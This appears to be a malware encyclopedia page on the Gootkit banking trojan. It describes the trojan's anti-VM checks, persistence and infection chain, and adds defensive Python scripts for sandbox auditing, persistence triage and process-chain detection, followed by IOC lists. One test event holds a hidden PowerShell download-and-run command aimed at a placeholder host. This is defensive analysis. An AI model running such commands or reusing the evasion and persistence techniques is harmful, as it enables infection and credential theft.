Gootkit

Gootkit is an advanced banking trojan. It is extremely good at evading detection and has an incredibly effective persistence mechanism, which makes it a dangerous malware that researchers and organizations should be aware of.

Type: Trojan
Origin: Unknown
First seen: 1 June, 2014
Last seen: 22 September, 2020
Also known as: Waldek, Xswkit, Talalpek
Global rank: 29
Week rank: 25
Month rank: 34
IOCs: 907

What is Gootkit malware?

Gootkit is a banking Trojan, a malware created to steal banking credentials. In fact, Gootkit is classified as one of the most sophisticated banking Trojans ever created. It relies on complex evasion and persistence mechanisms, as well as advanced techniques like dynamic web injections.

Since its initial discovery in 2014, Gootkit has been utilized in multiple attacks that targeted bank accounts across Europe, some of which were very destructive.

Gootkit is known to affect the most widely used web browsers, namely IE, Firefox and Chrome. Interestingly, this trojan is written mostly in Node.js, not the first choice for most malware operators. What's more, while many similar malicious programs heavily reuse leaked source code from older samples, Gootkit appears to have been written almost entirely from scratch.

General description of Gootkit

The roots of this malware go all the way back to 2010, when what can be called the predecessor of Gootkit was first documented. Classified at the time as an information stealer that did not pose a significant danger, Gootkit has since evolved into a full-fledged banking Trojan.

The malware has been documented in its present form as a Trojan since 2014 and has been involved in attacks targeting both private and corporate victims in Europe, mainly banks in France and England, although Spanish and Italian banks have also reportedly been attacked.

Unlike some other Trojans, Gootkit is not available for sale on the internet. Its code also hasn't been leaked, and all attacks involving this malware have been carried out by a Russian-speaking group of hackers.

Creators of this Trojan have implemented some of the most cutting-edge evasion tricks to keep the payload hidden for as long as possible and to hinder analysis by security researchers. Gootkit comprises two main parts, the dropper and the Trojan itself, and carries out sandbox checks at every stage of its life cycle: both the dropper and the actual Trojan have their own anti-analysis procedures.

Once the dropper makes its way onto a machine, it conducts an initial VM check to make sure the malware is not being launched in a virtual environment. It does this by reading the processor value in the Windows Registry and checking it for the names of known virtualization products. The BIOS is also checked for any values that could indicate the malware is running on a VM. If the malware detects that it is not running on a real machine, it terminates all activity and connects to the control server to blacklist the endpoint it was launched on.

If the initial test is passed, however, the loader installs the main Gootkit executable, which in turn repeats some of the previous checks and adds several new ones. In one of the new checks, the malware compares the CPU name against a whitelist of admissible names to confirm that no VM name is present. Following this test, it scans the IDE/SCSI hard drives for VMware, VBOX or SONI values.
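For a sandbox operator, the practical question raised by these checks is whether an analysis VM exposes the artifacts Gootkit looks for. The script below is an added example (not ANY.RUN's or Gootkit's code) that audits a snapshot of the guest's processor name, BIOS strings and disk identifiers against the checks described above. The VMWARE/VBOX/SONI disk markers come from the text; the processor and BIOS marker lists, the registry value names used to gather the snapshot, and the two sample snapshots are the example's own assumptions and constructed data.

```python
"""Audit an analysis VM for the hypervisor artifacts the write-up says Gootkit checks.

Added example, not ANY.RUN's or Gootkit's code. The snapshot dict would be filled
by an operator from inside the guest; every value below is constructed.
"""

# Substrings the write-up says the IDE/SCSI disk check looks for.
DISK_MARKERS = ("VMWARE", "VBOX", "SONI")
# The processor and BIOS checks are described only as "names of virtual servers";
# these marker lists are assumptions for the audit, not Gootkit's own lists.
CPU_MARKERS = ("VIRTUAL", "VMWARE", "QEMU", "KVM", "XEN", "HYPER-V")
BIOS_MARKERS = ("VMWARE", "VBOX", "VIRTUALBOX", "QEMU", "BOCHS", "SEABIOS",
                "XEN", "HYPER-V", "PARALLELS")


def _hits(values, markers):
    """Return (value, marker) pairs where a marker occurs in a value, case-insensitively."""
    out = []
    for value in values:
        upper = value.upper()
        for marker in markers:
            if marker in upper:
                out.append((value, marker))
                break  # one finding per value is enough
    return out


def audit_snapshot(snapshot):
    """Return a list of findings; an empty list means none of the modelled checks would fire.

    Snapshot keys (gathering locations are assumptions of this example):
      processor_name: HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0, ProcessorNameString
      bios_strings:   HKLM\\HARDWARE\\DESCRIPTION\\System, SystemBiosVersion / VideoBiosVersion
      disk_ids:       friendly names or hardware IDs of the IDE and SCSI disks
    """
    findings = []
    for value, marker in _hits([snapshot.get("processor_name", "")], CPU_MARKERS):
        findings.append(f"processor name exposes '{marker}': {value}")
    for value, marker in _hits(snapshot.get("bios_strings", []), BIOS_MARKERS):
        findings.append(f"BIOS string exposes '{marker}': {value}")
    for value, marker in _hits(snapshot.get("disk_ids", []), DISK_MARKERS):
        findings.append(f"disk identifier exposes '{marker}': {value}")
    return findings


# Constructed snapshots: a stock VirtualBox guest and a guest whose identifiers
# have been made to look like commodity hardware.
STOCK_VBOX_GUEST = {
    "processor_name": "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
    "bios_strings": ["VBOX   - 1", "Oracle VM VirtualBox"],
    "disk_ids": ["VBOX HARDDISK ATA Device", "IDE\\DiskVBOX_HARDDISK"],
}
HARDENED_GUEST = {
    "processor_name": "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
    "bios_strings": ["DELL   - 1072009", "Intel(R) UEFI Graphics Output Protocol"],
    "disk_ids": ["ST1000DM003-1CH162 ATA Device"],
}

if __name__ == "__main__":
    for name, snap in (("stock VirtualBox", STOCK_VBOX_GUEST), ("hardened", HARDENED_GUEST)):
        findings = audit_snapshot(snap)
        print(f"{name}: {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

The stock guest produces four findings (two BIOS strings and two disk identifiers); the hardened guest produces none. A sandbox team can run the audit after each image change to confirm the checks described above would not short-circuit a detonation.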

Such thorough virtual machine checks are not the only trick Gootkit has up its sleeve when it comes to evasion. To increase the success rate of installs, the malware creators frequently modify the Trojan, changing the processes targeted for injection and the file type of the executable.

For example, instead of running an .exe file, some Gootkit samples load a DLL directly into a target process. What's more, while the majority of malware selects the explorer.exe process as its injection target, Gootkit targets a service host (svchost.exe) process instead. Presumably this is done to further evade detection, since injecting into a process that normally has several running instances makes Gootkit easier to hide.

In addition to advanced anti-detection methods, Gootkit employs equally sophisticated persistence techniques to make its removal from an infected machine as complicated as possible. The malware has two main persistence mechanisms, used depending on the available system privileges. When launched from an admin account, Gootkit can register itself as a Windows service with a random name, which helps it blend in with legitimate services. This way, it launches before a victim logs on and keeps running after they log off.

If launched from a least-privilege user account, however, the malware registers itself as a scheduled task, also with a random name. The task is set to run every minute and on every boot, ensuring that the malware remains on the machine after antivirus scans and system reboots.
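The two persistence paths above leave a recognisable footprint: a randomly named service or task, a binary in a user-writable location, and (for the task) a one-minute repetition plus a boot or logon trigger. The following added example (not ANY.RUN's code) triages constructed, simplified task and service records with those heuristics. The record layout, the "random-looking name" test and the path pattern are the example's own assumptions, not fields or thresholds from the page.

```python
"""Triage scheduled tasks and services for the persistence pattern described above.

Added example, not ANY.RUN's or Gootkit's code. The records are constructed,
simplified rows rather than real schtasks/sc output; the heuristics are assumptions.
"""
import re

# Assumption: locations a standard user can write to, where a dropped payload tends to live.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)


def looks_random(name):
    """Heuristic: a long name with almost no vowels reads as machine-generated."""
    core = re.sub(r"[^a-z]", "", name.lower())
    if len(core) < 8:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in core) / len(core)
    return vowel_ratio < 0.25


def triage_tasks(tasks):
    """Return (task name, reasons) for tasks matching at least three of the indicators."""
    flagged = []
    for task in tasks:
        reasons = []
        if looks_random(task["name"]):
            reasons.append("random-looking name")
        if task.get("repeat_minutes") == 1:
            reasons.append("repeats every minute")
        if set(task.get("triggers", [])) & {"boot", "logon"}:
            reasons.append("runs at boot/logon")
        if USER_WRITABLE.search(task["command"]):
            reasons.append("binary in user-writable path")
        if len(reasons) >= 3:
            flagged.append((task["name"], reasons))
    return flagged


def triage_services(services):
    """Return (service name, reasons) for services with a random name AND a user-writable binary."""
    flagged = []
    for svc in services:
        reasons = []
        if looks_random(svc["name"]) or looks_random(svc["display"]):
            reasons.append("random-looking name")
        if USER_WRITABLE.search(svc["path"]):
            reasons.append("binary in user-writable path")
        if len(reasons) == 2:
            flagged.append((svc["name"], reasons))
    return flagged


# Constructed records: two legitimate updaters, one suspicious task; one real-looking
# service and one suspicious service.
TASKS = [
    {"name": "MicrosoftEdgeUpdateTaskMachineCore", "triggers": ["logon", "daily"], "repeat_minutes": 60,
     "command": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c"},
    {"name": "Wxkqjvhtr", "triggers": ["boot", "logon"], "repeat_minutes": 1,
     "command": r"C:\Users\alice\AppData\Roaming\ftkmpqwrs\ftkmpqwrs.exe"},
    {"name": "OneDrive Standalone Update Task", "triggers": ["daily"], "repeat_minutes": 1440,
     "command": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"},
]
SERVICES = [
    {"name": "wuauserv", "display": "Windows Update",
     "path": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"name": "qhtrkzvplm", "display": "qhtrkzvplm",
     "path": r"C:\ProgramData\qhtrkzvplm\qhtrkzvplm.exe"},
]

if __name__ == "__main__":
    for name, reasons in triage_tasks(TASKS):
        print(f"task    {name}: {', '.join(reasons)}")
    for name, reasons in triage_services(SERVICES):
        print(f"service {name}: {', '.join(reasons)}")
```

Only the Wxkqjvhtr task and the qhtrkzvplm service are flagged; the OneDrive task lives under AppData but has none of the other indicators, which is why the rule requires several indicators together. On a real host the records would be built from `schtasks /query /fo CSV /v` or `Get-ScheduledTask`, and from `sc query` or `Get-Service`.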

Gootkit malware analysis

A video of the simulation recorded in the ANY.RUN malware hunting service lets us take a closer look at Gootkit's execution and see this malware in action. The video is available here.


Figure 1: the lifecycle of Gootkit can be viewed in a visual format on the process graph generated by the ANY.RUN online analysis sandbox.


Figure 2: This text report, available at this link, provides more detailed information about Gootkit's execution processes, artifacts and more.

Gootkit execution process

Gootkit often gets into the system as an email attachment in the form of a Microsoft Word file. After the user opens the malicious file, it starts PowerShell to download the main payload.

It should be noted that in some cases Gootkit postpones execution by registering itself as a scheduled task. Once the main payload starts, Gootkit unpacks and launches itself. This process carries out the main malicious activity: stealing personal information, downloading other malware, recording video of the victim's desktop, hijacking banking credentials, connecting to C2 servers and so on. In the given example, Gootkit also uses WMIC.EXE to obtain a list of installed antivirus products.
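The process chain just described (Word document, PowerShell download, payload, WMIC antivirus enumeration) is what a detection engineer would want to match in endpoint telemetry. The script below is an added example (not ANY.RUN's code) that walks constructed, Sysmon-style process-creation records by parent PID and raises an alert for PowerShell spawned by an Office application and for a WMIC antivirus query running under that chain. The event fields, the regular expressions and the sample events (including the placeholder URL) are the example's own assumptions and constructed data.

```python
"""Flag the Office -> PowerShell -> (WMIC antivirus query) chain described above.

Added example, not ANY.RUN's or Gootkit's code. Events are constructed,
Sysmon-style process-creation records (pid, ppid, image, cmdline); the
matching rules are assumptions of this example.
"""
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Command-line fragments typical of a download cradle (assumption for the severity rating).
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|https?://",
    re.IGNORECASE)
# The WMI class/namespace WMIC reads to list antivirus products.
AV_QUERY_RE = re.compile(r"AntiVirusProduct|SecurityCenter2?", re.IGNORECASE)


def base_name(image):
    """Lower-case file name of an image path, accepting either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(event, index):
    """Yield parent, grandparent, ... by following ppid links (cycle-safe)."""
    seen = set()
    cur = event
    while cur["ppid"] in index and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = index[cur["ppid"]]
        yield cur


def detect(events):
    """Return (pid, message) alerts for the chain of interest."""
    index = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = base_name(e["image"])
        parents = [base_name(p["image"]) for p in ancestors(e, index)]
        if name == "powershell.exe" and parents and parents[0] in OFFICE_IMAGES:
            sev = "high" if DOWNLOAD_RE.search(e["cmdline"]) else "medium"
            alerts.append((e["pid"], f"Office spawned PowerShell ({sev})"))
        if (name == "wmic.exe" and AV_QUERY_RE.search(e["cmdline"])
                and any(p in OFFICE_IMAGES or p == "powershell.exe" for p in parents)):
            alerts.append((e["pid"], "WMIC antivirus enumeration under Office/PowerShell chain"))
    return alerts


# Constructed events: the malicious chain plus an unrelated, benign PowerShell run.
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1200, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\alice\\Downloads\\invoice.doc"'},
    {"pid": 1344, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://placeholder.invalid/a.exe','C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe')\""},
    {"pid": 1500, "ppid": 1344, "image": r"C:\Users\alice\AppData\Local\Temp\a.exe", "cmdline": "a.exe"},
    {"pid": 1612, "ppid": 1500, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"pid": 2000, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for pid, message in detect(EVENTS):
        print(f"pid {pid}: {message}")
```

Two alerts fire: the PowerShell process under WINWORD.EXE (rated high because of the download cradle) and the WMIC query two generations below it. The backup script started from explorer.exe is left alone, since the rule keys on the parent chain rather than on PowerShell alone.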

Distribution of Gootkit

Gootkit uses multiple attack vectors to infect its victims, including popular exploit kits like Neutrino and Angler, which allow the malware to get onto machines running outdated operating systems.

The second attack vector is email spam, where Gootkit is delivered to users as a malicious email attachment and social engineering is used to trick the user into downloading the malicious file.

How to avoid infection by Gootkit?

Several rules of online safety can be followed to greatly reduce the risk of infection by malware such as Gootkit. For instance, users are advised to install the latest OS updates and to keep regularly used applications up to date.

At the same time, applications that are rarely opened should be removed from the machine. In addition, it is advised to block ads in the browser and avoid visiting suspicious websites. Furthermore, if a private inbox is used at work instead of a corporate one, the user should refrain from sending sensitive information to and from this personal email address.

It should be noted that opening attachments in suspicious emails always poses a high risk of infection, so users must never run suspicious programs downloaded from emails sent from unrecognized addresses.

How to export Gootkit data using ANY.RUN?

If an analyst wants to do additional work with the events from a task, or just share them with colleagues, they can export them to different formats. Just click the "Export" button and choose the most suitable format in the drop-down menu.

Figure 3: Options for exporting events from tasks with Gootkit.

Conclusion

Although Gootkit is responsible for a negligible percentage of overall attacks by financial malware, this Trojan should be considered an extremely high-risk threat. Thanks to its sophisticated persistence and evasion functions, it is capable of potentially very damaging attacks.

What's more, following the development of this Trojan over the years, it is safe to assume that its evolution will continue and that the cybercriminals behind the malware will keep finding ways to evade modern security solutions.

That's why using the most reliable and cutting-edge analysis tools, such as the ANY.RUN malware hunting service, can be key to setting up a secure cyber defense against serious threats like Gootkit.

IOCs

IP addresses
5.45.71.227
216.218.185.162
216.218.135.114
91.193.181.158
37.1.207.160
50.63.202.74
5.61.34.67
184.105.76.250
64.71.188.178
37.1.214.148
216.218.208.114
185.4.65.222
222.122.84.57
185.158.248.151
183.111.141.97
185.158.248.133
5.45.127.15
31.214.157.4
Domains
majul.com
isns.net
celebs.gallery
i-took-eyes.xyz
activeterroristwarningcompany.com
oththukaruva.com
w0cdshof1vw4gxy4g65.ddns.net
k6qxufidsfa8axmn3xi.ddns.net
ivyxox3ti4whc0u.ddns.net
oljjbfgtckwrkmdbs.com
jiylhedvnplmrigqv.me
nkvisiujbuhkcvrqw.com
epl.paypal.communication.com
jw61gd6328hdy3tep.cc
assumenextelbelow.com
piwxvumpyptp.in
piwxvumpyptp.net
piwxvumpyptp.com
www.medicinecomplete.com
